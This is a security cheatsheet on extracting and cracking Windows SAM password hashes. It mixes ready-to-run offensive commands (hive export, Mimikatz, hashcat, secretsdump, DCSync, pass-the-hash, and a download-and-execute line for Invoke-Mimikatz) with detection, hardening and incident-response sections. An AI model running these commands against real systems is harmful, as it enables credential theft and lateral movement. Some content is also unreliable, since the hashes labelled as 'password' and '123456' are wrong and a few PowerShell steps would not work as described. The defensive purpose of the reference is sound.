=============================================================================== LOCALSAM DUMP SECURITY CHEATSHEET JOHLEM.net IT SECURITY CHEATSHEETS =============================================================================== --- WHAT IS LOCALSAM DUMP --- LocalSamDump is a password hash extraction technique targeting the Windows SAM (Security Account Manager) database. The SAM stores local user account passwords as hashes and is a critical component of Windows authentication. Location: C:\Windows\System32\config\SAM Purpose: Contains local user account password hashes (NTLM/LM) Access: Requires administrative privileges or SYSTEM access --- SAM DATABASE BASICS --- SAM File Structure: - Stored in registry hive format - Contains user account information (RID, username, password hash) - Protected by SYSKEY encryption - Locked when Windows is running (requires offline access or special tools) Hash Types: LM Hash - Legacy, weak (disabled by default in modern Windows) NTLM Hash - MD4 hash of Unicode password NTLMv2 - Challenge-response protocol (not stored in SAM) --- EXTRACTION METHODS --- ## Method 1: Registry Extraction (Administrative Access) reg save HKLM\SAM C:\temp\sam.hive reg save HKLM\SYSTEM C:\temp\system.hive reg save HKLM\SECURITY C:\temp\security.hive ## Method 2: Volume Shadow Copy vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\ ## Method 3: Offline Boot (Linux/WinPE) - Boot from external media - Mount Windows drive - Copy SAM/SYSTEM files directly ## Method 4: Memory Dump Analysis - Extract from crash dumps - Live memory acquisition - Hibernation file analysis --- TOOLS FOR EXTRACTION --- ## PWDumpX pwdumpx -h # Help pwdumpx -o output.txt # Dump to file pwdumpx -s # Include SIDs ## SAMdump2 (Linux) samdump2 system.hive sam.hive # Basic extraction samdump2 -o output.txt system.hive sam.hive # Output to file ## Ophcrack ophcrack -t tables -d directory -f sam.txt # Crack with rainbow tables ophcrack -g # GUI mode ## John the Ripper john --format=NT hashes.txt # Crack NTLM hashes john --wordlist=rockyou.txt hashes.txt # Dictionary attack john --show hashes.txt # Show cracked passwords ## Hashcat hashcat -m 1000 hashes.txt rockyou.txt # NTLM cracking hashcat -m 3000 hashes.txt rockyou.txt # LM cracking hashcat -a 3 -m 1000 hashes.txt ?a?a?a?a?a?a # Brute force ## Mimikatz privilege::debug # Enable debug privilege token::elevate # Elevate to SYSTEM lsadump::sam # Dump SAM database lsadump::secrets # Dump LSA secrets ## CrackMapExec crackmapexec smb target -u user -p pass --sam # Remote SAM dump crackmapexec smb target -u user -H hash --sam # Pass-the-hash + SAM --- POWERSHELL EXTRACTION --- ## Registry Method $sam = Get-ItemProperty -Path "HKLM:\SAM\SAM\Domains\Account\Users\*" $system = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" ## Using Invoke-Mimikatz IEX (New-Object Net.WebClient).DownloadString('http://server/Invoke-Mimikatz.ps1') Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"' ## Manual Registry Dump reg save HKLM\SAM sam.hive reg save HKLM\SYSTEM system.hive Get-Content sam.hive | Out-File -Encoding ASCII sam.txt --- HASH FORMATS --- ## NTLM Hash Format username:RID:LMhash:NTLMhash::: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ## PWDump Format username:userid:LMhash:NTLMhash::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: ## John the Ripper Format $NT$hash $LM$hash ## Hashcat Format hash user:hash --- CRACKING TECHNIQUES --- ## Dictionary Attack john --wordlist=passwords.txt hashes.txt hashcat -a 0 -m 1000 hashes.txt wordlist.txt ## Brute Force john --incremental hashes.txt hashcat -a 3 -m 1000 hashes.txt ?a?a?a?a?a?a?a?a ## Hybrid Attack hashcat -a 6 -m 1000 hashes.txt wordlist.txt ?d?d?d?d hashcat -a 7 -m 1000 hashes.txt ?d?d?d?d wordlist.txt ## Rainbow Tables ophcrack -t tables -f hashes.txt rcrack tables -f hashes.txt ## Rule-Based Attack john --rules=best64 --wordlist=rockyou.txt hashes.txt hashcat -a 0 -r rules/best64.rule -m 1000 hashes.txt rockyou.txt --- DEFENSE TECHNIQUES --- ## Detection Methods Monitor registry access to SAM hive Log unusual process accessing lsass.exe Detect offline boot attempts Monitor VSS (Volume Shadow Copy) usage Alert on mimikatz/credential dumping signatures ## Registry Monitoring Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4656} | Where-Object {$_.Message -match "SAM"} ## Process Monitoring Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4656} | Where-Object {$_.Message -match "lsass"} ## File System Monitoring Get-ChildItem -Path "C:\Windows\System32\config" | Where-Object {$_.LastAccessTime -gt (Get-Date).AddMinutes(-10)} --- PREVENTION STRATEGIES --- ## Strong Password Policy - Minimum 12 characters - Complexity requirements - Regular password changes - Account lockout policies ## System Hardening Disable LM hash storage: NoLMHash = 1 (Registry: HKLM\SYSTEM\CurrentControlSet\Control\Lsa) Enable Additional LSA Protection: RunAsPPL = 1 (Registry: HKLM\SYSTEM\CurrentControlSet\Control\Lsa) Disable WDigest: UseLogonCredential = 0 (HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest) ## Access Controls - Limit administrative access - Use principle of least privilege - Monitor privileged account usage - Implement LAPS for local admin passwords --- INCIDENT RESPONSE --- ## Indicators of Compromise - Unexpected SAM file access - Registry hive exports - Unusual lsass.exe process access - Volume shadow copy creation - Presence of credential dumping tools ## Investigation Steps 1. Identify affected systems 2. Collect memory dumps 3. Analyze event logs 4. Check for lateral movement 5. Reset compromised accounts 6. Implement additional monitoring ## Forensic Collection Get-Process lsass | Select-Object Id, ProcessName, StartTime Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4656 -and $_.Message -match "SAM"} Get-ChildItem -Path "C:\Windows\System32\config" -Force | Select-Object Name, LastWriteTime, LastAccessTime --- REMEDIATION ACTIONS --- ## Immediate Response 1. Isolate affected systems 2. Change all local admin passwords 3. Reset service account passwords 4. Check for persistence mechanisms 5. Scan for additional malware ## Password Reset Script $users = Get-LocalUser | Where-Object {$_.Enabled -eq $true} foreach ($user in $users) { $newPassword = -join ((33..126) | Get-Random -Count 15 | % {[char]$_}) $securePassword = ConvertTo-SecureString $newPassword -AsPlainText -Force Set-LocalUser -Name $user.Name -Password $securePassword Write-Output "$($user.Name): $newPassword" } ## LAPS Deployment Install-WindowsFeature RSAT-Feature-Tools-GP-LGPO Import-Module AdmPwd.PS Update-AdmPwdADSchema Set-AdmPwdComputerSelfPermission -OrgUnit "OU=Computers,DC=domain,DC=com" --- ADVANCED PROTECTION --- ## Credential Guard Enable Windows Defender Credential Guard: - Virtualization-based security - Protects LSA secrets - Prevents credential dumping ## LSASS Protection RunAsPPL (Protected Process Light): reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 ## Audit Policies auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable auditpol /set /subcategory:"Logon" /success:enable /failure:enable auditpol /set /subcategory:"Special Logon" /success:enable /failure:enable --- POWERSHELL DETECTION --- ## Suspicious Activity Detection Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object {$_.Message -match "(SAM|lsass|mimikatz|sekurlsa|lsadump)"} ## Registry Access Monitoring $RegAction = { $Event = $Event.SourceEventArgs.NewEvent if ($Event.KeyPath -match "SAM|LSA") { Write-Warning "Suspicious registry access: $($Event.KeyPath)" } } Register-WmiEvent -Query "SELECT * FROM RegistryKeyChangeEvent WHERE Hive='HKEY_LOCAL_MACHINE' AND KeyPath LIKE '%SAM%'" -Action $RegAction --- HASH ANALYSIS --- ## Common Weak Hashes 31d6cfe0d16ae931b73c59d7e0c089c0 # Empty password aad3b435b51404eeaad3b435b51404ee # Empty LM hash c74761604a24a0dfd0c7cce7b0ba1b82 # Password "password" 209c6174da490caeb422f3fa5a7ae634 # Password "123456" ## Hash Identification function Test-HashType { param($Hash) switch ($Hash.Length) { 32 { "NTLM/MD4/MD5" } 40 { "SHA-1" } 64 { "SHA-256" } default { "Unknown" } } } ## Bulk Hash Analysis $hashes = Get-Content "hashes.txt" foreach ($hash in $hashes) { $type = Test-HashType $hash.Split(':')[3] Write-Output "$hash - Type: $type" } --- NETWORK-BASED ATTACKS --- ## Remote SAM Extraction impacket-secretsdump domain/user:pass@target impacket-secretsdump -hashes lm:nt domain/user@target ## DCSync Attack (Domain) mimikatz "lsadump::dcsync /domain:company.com /user:Administrator" ## Pass-the-Hash impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 user@target --- USEFUL FUNCTIONS --- ## Extract RID from Hash File function Get-RIDFromHash { param($HashFile) Get-Content $HashFile | ForEach-Object { $parts = $_ -split ':' Write-Output "User: $($parts[0]), RID: $($parts[1])" } } ## Check for Weak Passwords function Test-WeakHashes { param($HashFile) $weakHashes = @( "31d6cfe0d16ae931b73c59d7e0c089c0", # Empty "aad3b435b51404eeaad3b435b51404ee" # Empty LM ) Get-Content $HashFile | ForEach-Object { $hash = ($_ -split ':')[3] if ($hash -in $weakHashes) { Write-Warning "Weak hash found: $_" } } } ## Generate Hash Statistics function Get-HashStats { param($HashFile) $hashes = Get-Content $HashFile Write-Output "Total accounts: $($hashes.Count)" Write-Output "Unique NTLM hashes: $(($hashes | ForEach-Object {($_ -split ':')[3]} | Sort-Object -Unique).Count)" Write-Output "Empty passwords: $(($hashes | Where-Object {($_ -split ':')[3] -eq '31d6cfe0d16ae931b73c59d7e0c089c0'}).Count)" } --- LEGAL CONSIDERATIONS --- ⚠️ WARNING: SAM dumping techniques should only be used: - On systems you own or have explicit authorization to test - During authorized penetration testing engagements - For legitimate security research - In controlled lab environments Unauthorized access to password hashes may violate: - Computer Fraud and Abuse Act (CFAA) in the US - Computer Misuse Act in the UK - Similar cybercrime laws in other jurisdictions --- MITIGATION SUMMARY --- 1. Implement strong password policies 2. Enable Credential Guard where possible 3. Use LAPS for local administrator accounts 4. Monitor for suspicious registry/file access 5. Disable legacy authentication methods 6. Implement proper access controls 7. Regular security awareness training 8. Deploy endpoint detection and response (EDR) 9. Network segmentation 10. Principle of least privilege =============================================================================== Pro Tips: - Always use authorized testing environments - Document all testing activities - Keep tools and techniques updated - Understand legal implications - Focus on defense and detection - Regular password audits help identify weak credentials More resources: JOHLEM.net ===============================================================================